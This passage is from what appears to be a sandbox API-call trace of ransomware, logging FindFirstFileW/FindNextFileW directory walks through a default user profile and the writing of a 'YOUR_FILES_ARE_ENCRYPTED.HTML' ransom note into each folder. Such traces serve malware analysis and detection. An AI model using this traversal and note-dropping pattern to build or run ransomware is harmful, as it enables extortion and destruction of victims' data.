PathFindExtensionW (pszPath="04_Music_played_in_the_last_month.wpl") returned=".wpl" [0170.540] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x31d, dwReserved0=0x0, dwReserved1=0x60, cFileName="05_Pictures_taken_in_the_last_month.wpl", cAlternateFileName="05_PIC~1.WPL")) returned 1 [0170.540] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\05_Pictures_taken_in_the_last_month.wpl") returned 127 [0170.540] lstrcmpW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.540] PathFindExtensionW (pszPath="05_Pictures_taken_in_the_last_month.wpl") returned=".wpl" [0170.540] lstrlenW (lpString=".wpl") returned 4 [0170.540] PathFindExtensionW (pszPath="05_Pictures_taken_in_the_last_month.wpl") returned=".wpl" [0170.541] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x311, dwReserved0=0x0, dwReserved1=0x60, cFileName="06_Pictures_rated_4_or_5_stars.wpl", cAlternateFileName="06_PIC~1.WPL")) returned 1 [0170.541] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync 
Playlists\\en-US\\0000FDBE\\06_Pictures_rated_4_or_5_stars.wpl") returned 122 [0170.541] lstrcmpW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.541] PathFindExtensionW (pszPath="06_Pictures_rated_4_or_5_stars.wpl") returned=".wpl" [0170.541] lstrlenW (lpString=".wpl") returned 4 [0170.541] PathFindExtensionW (pszPath="06_Pictures_rated_4_or_5_stars.wpl") returned=".wpl" [0170.541] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x410, dwReserved0=0x0, dwReserved1=0x60, cFileName="07_TV_recorded_in_the_last_week.wpl", cAlternateFileName="07_TV_~1.WPL")) returned 1 [0170.541] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\07_TV_recorded_in_the_last_week.wpl") returned 123 [0170.541] lstrcmpW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.541] PathFindExtensionW (pszPath="07_TV_recorded_in_the_last_week.wpl") returned=".wpl" [0170.541] lstrlenW (lpString=".wpl") returned 4 [0170.541] PathFindExtensionW (pszPath="07_TV_recorded_in_the_last_week.wpl") returned=".wpl" [0170.541] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, 
nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0x0, dwReserved1=0x60, cFileName="08_Video_rated_at_4_or_5_stars.wpl", cAlternateFileName="08_VID~1.WPL")) returned 1 [0170.541] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\08_Video_rated_at_4_or_5_stars.wpl") returned 122 [0170.541] lstrcmpW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.541] PathFindExtensionW (pszPath="08_Video_rated_at_4_or_5_stars.wpl") returned=".wpl" [0170.541] lstrlenW (lpString=".wpl") returned 4 [0170.541] PathFindExtensionW (pszPath="08_Video_rated_at_4_or_5_stars.wpl") returned=".wpl" [0170.541] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x401, dwReserved0=0x0, dwReserved1=0x60, cFileName="09_Music_played_the_most.wpl", cAlternateFileName="09_MUS~1.WPL")) returned 1 [0170.541] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\09_Music_played_the_most.wpl") returned 116 [0170.541] lstrcmpW (lpString1="09_Music_played_the_most.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.541] PathFindExtensionW (pszPath="09_Music_played_the_most.wpl") returned=".wpl" [0170.541] lstrlenW (lpString=".wpl") returned 4 [0170.541] PathFindExtensionW (pszPath="09_Music_played_the_most.wpl") returned=".wpl" [0170.541] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: 
lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb97380, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb97380, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x427, dwReserved0=0x0, dwReserved1=0x60, cFileName="10_All_Music.wpl", cAlternateFileName="10_ALL~1.WPL")) returned 1 [0170.541] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\10_All_Music.wpl") returned 104 [0170.541] lstrcmpW (lpString1="10_All_Music.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.542] PathFindExtensionW (pszPath="10_All_Music.wpl") returned=".wpl" [0170.542] lstrlenW (lpString=".wpl") returned 4 [0170.542] PathFindExtensionW (pszPath="10_All_Music.wpl") returned=".wpl" [0170.542] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb97380, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb97380, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0x0, dwReserved1=0x60, cFileName="11_All_Pictures.wpl", cAlternateFileName="11_ALL~1.WPL")) returned 1 [0170.542] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\11_All_Pictures.wpl") returned 107 [0170.542] lstrcmpW (lpString1="11_All_Pictures.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.542] PathFindExtensionW (pszPath="11_All_Pictures.wpl") returned=".wpl" [0170.542] lstrlenW (lpString=".wpl") returned 4 
[0170.542] PathFindExtensionW (pszPath="11_All_Pictures.wpl") returned=".wpl" [0170.542] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb97380, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb97380, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0x0, dwReserved1=0x60, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 1 [0170.542] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\12_All_Video.wpl") returned 104 [0170.542] lstrcmpW (lpString1="12_All_Video.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.542] PathFindExtensionW (pszPath="12_All_Video.wpl") returned=".wpl" [0170.542] lstrlenW (lpString=".wpl") returned 4 [0170.542] PathFindExtensionW (pszPath="12_All_Video.wpl") returned=".wpl" [0170.542] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb97380, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb97380, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0x0, dwReserved1=0x60, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 0 [0170.542] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0170.544] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\YOUR_FILES_ARE_ENCRYPTED.HTML") 
returned 117 [0170.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000fdbe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0170.546] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0170.548] CloseHandle (hObject=0x5b8) returned 1 [0170.548] GetProcessHeap () returned 0x270000 [0170.549] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78c1008 | out: hHeap=0x270000) returned 1 [0170.549] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="0000FDBE", cAlternateFileName="")) returned 0 [0170.549] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0170.549] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0170.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync 
playlists\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0170.549] WriteFile (in: hFile=0x5a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0170.551] CloseHandle (hObject=0x5a4) returned 1 [0170.552] GetProcessHeap () returned 0x270000 [0170.552] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.559] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 0 [0170.559] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.559] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0170.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0170.560] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, 
lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.562] CloseHandle (hObject=0x5b0) returned 1 [0170.562] GetProcessHeap () returned 0x270000 [0170.563] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0170.564] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 0 [0170.564] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.564] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0170.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0170.564] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0170.566] CloseHandle (hObject=0x5fc) returned 1 [0170.566] GetProcessHeap () returned 0x270000 [0170.567] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: 
hHeap=0x270000) returned 1 [0170.568] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa03a7ee, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbcb71220, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd7997eba, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Windows", cAlternateFileName="")) returned 1 [0170.568] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb71220, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb42f5838, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Windows Mail", cAlternateFileName="WINDOW~3")) returned 1 [0170.568] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail") returned 57 [0170.568] GetProcessHeap () returned 0x270000 [0170.568] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0170.569] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail" [0170.569] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\*" 
[0170.569] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb71220, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb42f5838, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.690] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb71220, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb42f5838, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.690] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb4b0c0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb4b0c0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x859b5889, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x5e4, dwReserved0=0x0, dwReserved1=0x60, cFileName="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount", cAlternateFileName="ACCOUN~3.OEA")) returned 1 [0170.690] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount") returned 113 [0170.690] lstrcmpW (lpString1="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.690] PathFindExtensionW (pszPath="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount") returned=".oeaccount" [0170.690] lstrlenW (lpString=".oeaccount") returned 10 [0170.690] PathFindExtensionW (pszPath="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount") returned=".oeaccount" [0170.691] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb4b0c0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb4b0c0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x859b5889, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x6c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount", cAlternateFileName="ACCOUN~2.OEA")) returned 1 [0170.691] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount") returned 113 [0170.691] lstrcmpW (lpString1="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.691] PathFindExtensionW (pszPath="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount") returned=".oeaccount" [0170.691] lstrlenW (lpString=".oeaccount") returned 10 [0170.691] PathFindExtensionW (pszPath="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount") returned=".oeaccount" [0170.691] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb4b0c0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb4b0c0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x858aaee7, ftLastWriteTime.dwHighDateTime=0x1cb88f5, 
nFileSizeHigh=0x0, nFileSizeLow=0x2a0, dwReserved0=0x0, dwReserved1=0x60, cFileName="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount", cAlternateFileName="ACCOUN~1.OEA")) returned 1 [0170.691] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount") returned 113 [0170.691] lstrcmpW (lpString1="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.691] PathFindExtensionW (pszPath="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount") returned=".oeaccount" [0170.691] lstrlenW (lpString=".oeaccount") returned 10 [0170.691] PathFindExtensionW (pszPath="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount") returned=".oeaccount" [0170.691] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82d5fe78, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Backup", cAlternateFileName="")) returned 1 [0170.691] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup") returned 64 [0170.691] GetProcessHeap () returned 0x270000 [0170.691] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.692] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup") 
returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup" [0170.692] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*" [0170.692] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82d5fe78, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.693] FindNextFileW (in: 